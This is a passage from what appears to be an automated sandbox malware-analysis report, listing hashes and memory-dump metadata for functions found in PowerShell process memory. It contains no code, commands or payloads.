                            • API String ID:
                            • Opcode ID: ec1b41ecee19b2939c30256196cd5cdf21ce64f2e01c37c1c82d24db9e3ea657
                            • Instruction ID: 18c550bf9d2328a58d350408a535a72c3eff81461a06f00599e23a8d388438ed
                            • Opcode Fuzzy Hash: ec1b41ecee19b2939c30256196cd5cdf21ce64f2e01c37c1c82d24db9e3ea657
                            • Instruction Fuzzy Hash: B0E0D8315053448BC739A778D8409A677AEAF8221DB448CAEC15E4BA50CB72FC85C7C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16431664858.0000000008290000.00000040.00000001.sdmp, Offset: 08290000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8290000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7afed32513e624b4ff22f03581fbd9bbe5b18bb5341853444fbc0837f03e42ae
                            • Instruction ID: f246d50ddbad144dc45147dd64c0f0b0ae3b160e3cfb42fce813a27ba456a5fc
                            • Opcode Fuzzy Hash: 7afed32513e624b4ff22f03581fbd9bbe5b18bb5341853444fbc0837f03e42ae
                            • Instruction Fuzzy Hash: D2E092321083849FC711CB5AE824A413FE8DFC6231B1541EFE049DB663C624DC45C7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16431664858.0000000008290000.00000040.00000001.sdmp, Offset: 08290000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8290000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 69056a5b2a935041364143d00a503c13dfd9c69bece42fdbdcb938046bc61704
                            • Instruction ID: 639b69f4ec43bf5ad40f890038a0f27092aeec26db26a91b600c2eac2173d2f6
                            • Opcode Fuzzy Hash: 69056a5b2a935041364143d00a503c13dfd9c69bece42fdbdcb938046bc61704
                            • Instruction Fuzzy Hash: 42F0A72410C2C48FC701A7A4DD2A2A93F50EF93307F0805EDD9469F163EE7D49158792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437155577.00000000089B0000.00000040.00000001.sdmp, Offset: 089B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89b0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 98d7f2fc515e633c2145594463b5418dd0d4bed808dbb9c7d2d0f3534ce13f69
                            • Instruction ID: c8ba3b089600ea7c6da482d321cb873b616f94ccd6c0c19c5733dea950f0d049
                            • Opcode Fuzzy Hash: 98d7f2fc515e633c2145594463b5418dd0d4bed808dbb9c7d2d0f3534ce13f69
                            • Instruction Fuzzy Hash: A7F0E576600209DFC700EB58E1416ADF7A2EF80305F10846AE5068B350CF39A905CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16431664858.0000000008290000.00000040.00000001.sdmp, Offset: 08290000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8290000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7ac7a08df3c4eb77fef8e2df210dee13946a51fe758fee1c24dbab47335d0246
                            • Instruction ID: a0bcb2da3ae907b5c463ce26e3efc31e9d142306f86c56e96fd6a5ffa46a7615
                            • Opcode Fuzzy Hash: 7ac7a08df3c4eb77fef8e2df210dee13946a51fe758fee1c24dbab47335d0246
                            • Instruction Fuzzy Hash: FDF03930B412189BDB11DB94EC25BED7772EF85312F1000A9E605AB2E1CB392D10CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e661c8091ee0cd24945c62351d7e19003e599648d1f832a6fd79268f39536723
                            • Instruction ID: bea483a5cc97a868281552dff87e1b4420df0e15b1905c7a6b0711201f2703b6
                            • Opcode Fuzzy Hash: e661c8091ee0cd24945c62351d7e19003e599648d1f832a6fd79268f39536723
                            • Instruction Fuzzy Hash: 74E0C939E1011ACFCB54EF94D480CEDB375AF44315B1148A5DD116B362DF34AD02CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e661c8091ee0cd24945c62351d7e19003e599648d1f832a6fd79268f39536723
                            • Instruction ID: bea483a5cc97a868281552dff87e1b4420df0e15b1905c7a6b0711201f2703b6
                            • Opcode Fuzzy Hash: e661c8091ee0cd24945c62351d7e19003e599648d1f832a6fd79268f39536723
                            • Instruction Fuzzy Hash: 74E0C939E1011ACFCB54EF94D480CEDB375AF44315B1148A5DD116B362DF34AD02CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 362223ece63a563d85b378b6fe1bd67056a5cded20e46fab317482079d5a06fd
                            • Instruction ID: b1b3a97576c36da381c79ebd515b705a4b111e9a951c70427088496aedec072e
                            • Opcode Fuzzy Hash: 362223ece63a563d85b378b6fe1bd67056a5cded20e46fab317482079d5a06fd
                            • Instruction Fuzzy Hash: 00E012345007549FD335DB25D444B11BBE8AF49229F14CA9DD49B47661C7B2F849C780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437155577.00000000089B0000.00000040.00000001.sdmp, Offset: 089B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89b0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32e23db470b26d3a2cb7274ad18d3d872c990e52791e1e1e728031f58286e9b0
                            • Instruction ID: 5a72554b7c734c6efd8f5441d0f72d8f73997cf3387828ecb28d62a581ccad7a
                            • Opcode Fuzzy Hash: 32e23db470b26d3a2cb7274ad18d3d872c990e52791e1e1e728031f58286e9b0
                            • Instruction Fuzzy Hash: 81E04F762106048BD710EA58E4417BD7796DB88255F04886AD61A87651DB38A9064B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437155577.00000000089B0000.00000040.00000001.sdmp, Offset: 089B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89b0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cb8ef82b072ef162abcd6a7e64258b82016721680be120ea268f77f678610092
                            • Instruction ID: 3bafd574cbb0e901cc440f1d6a7ed22b96b1ef03bd6f53440e80a2fb838b86a0
                            • Opcode Fuzzy Hash: cb8ef82b072ef162abcd6a7e64258b82016721680be120ea268f77f678610092
                            • Instruction Fuzzy Hash: E8E026762006048FD710EB4CE4417FE7796DFC8312F00883AD61B87751CF38A9064B41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16431664858.0000000008290000.00000040.00000001.sdmp, Offset: 08290000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8290000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bebd9614c0bc33b8c3b96530221f08137337922fb41aa620fcc8c8c7988b28e3
                            • Instruction ID: bc5dc89694b730643f5418459135cd35d8e39898a884864edee1b3b96bb4cd30
                            • Opcode Fuzzy Hash: bebd9614c0bc33b8c3b96530221f08137337922fb41aa620fcc8c8c7988b28e3
                            • Instruction Fuzzy Hash: B0D05EE541E3905FCB228F28D8244643F709E5320134B01C3D4928F563DA1A990AEB22
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 311dcc96649f65f6fb8f0bb0e005488d777c26f68d62a8c0fe7a6e43b44b4991
                            • Instruction ID: 9cbd501f2a516ae540aaf32d23df10d17d706e4c571b708273b1a07a86beb12c
                            • Opcode Fuzzy Hash: 311dcc96649f65f6fb8f0bb0e005488d777c26f68d62a8c0fe7a6e43b44b4991
                            • Instruction Fuzzy Hash: 1DD0A71800F3D02FC7077720EC104553F387A83383318C4F29060B7193C2154944D3E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e3cf8464f20774371091bc4e143fe1088f190941ff6cff6a6af3f013fce1e72c
                            • Instruction ID: 4d30f1587d8cf31b4e4df3589befc565b5dc9fe3634e9cb2bae71626e332183a
                            • Opcode Fuzzy Hash: e3cf8464f20774371091bc4e143fe1088f190941ff6cff6a6af3f013fce1e72c
                            • Instruction Fuzzy Hash: 61D05E352100109FC700EB6CE809E95BBF9EB8D361B0141A6FB09C73A2CA359C008B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8980000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                            • Instruction ID: 2e3374e80c8e4c15c08d0b1cd9e0eea05154c51e8db3c1cd667badc3f3607770
                            • Opcode Fuzzy Hash: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                            • Instruction Fuzzy Hash: 9AD09235A00019CBCF04DF88D8447DCF7B0FB8832AF1480AAD918B7281C776A956CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ad9d89df56d59eaa7e4591e7ce5d1306fe0a88e6e01fd7bd5fbebcccfe0509e1
                            • Instruction ID: ca9cd35faa6f5c33ada197695efd34e0dca23181eae6787d8d03e27799de440f
                            • Opcode Fuzzy Hash: ad9d89df56d59eaa7e4591e7ce5d1306fe0a88e6e01fd7bd5fbebcccfe0509e1
                            • Instruction Fuzzy Hash: 79C0122500B3C96F86222275290889A3E2C888312034487D2B024860E79E2C890482A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5ac7253544befd90a75c2a9215341b77ac5bcc884693bd88b36a27da3912be0
                            • Instruction ID: 80d1aebbdc0f1cbfc2e1dd2390ce6baaecab1b69dcd123ee5bc80488d84cbd43
                            • Opcode Fuzzy Hash: e5ac7253544befd90a75c2a9215341b77ac5bcc884693bd88b36a27da3912be0
                            • Instruction Fuzzy Hash: 37C08C3144F3C10FC3238738606809C7F22DF93228B2808EED0CB86093CEAB482A8711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c35a19a853bcdca0691b24ca04ef68affc6ec8cb24f5f8c220193af6964dffa
                            • Instruction ID: 4636aa473d321b7166de79d0f5f5b0924c42c3febbd9f5c27b52a858b5960d17
                            • Opcode Fuzzy Hash: 8c35a19a853bcdca0691b24ca04ef68affc6ec8cb24f5f8c220193af6964dffa
                            • Instruction Fuzzy Hash: 29A0223200038C8F822022B03008808B32CC082A00380C8A8E00C830028F3EEC0000C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a68248ace54f03ae1178830bc11e48710c912c22d2b090f5c0d1e70e68ab82ba
                            • Instruction ID: 2270977a0609072c0b2602e4062806864953d3713422629bc1d0fd14ada55d90
                            • Opcode Fuzzy Hash: a68248ace54f03ae1178830bc11e48710c912c22d2b090f5c0d1e70e68ab82ba
                            • Instruction Fuzzy Hash: 7EA0223000030C8B828222B8300888C332CE082B223808828E00C830008F3EEC0000C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions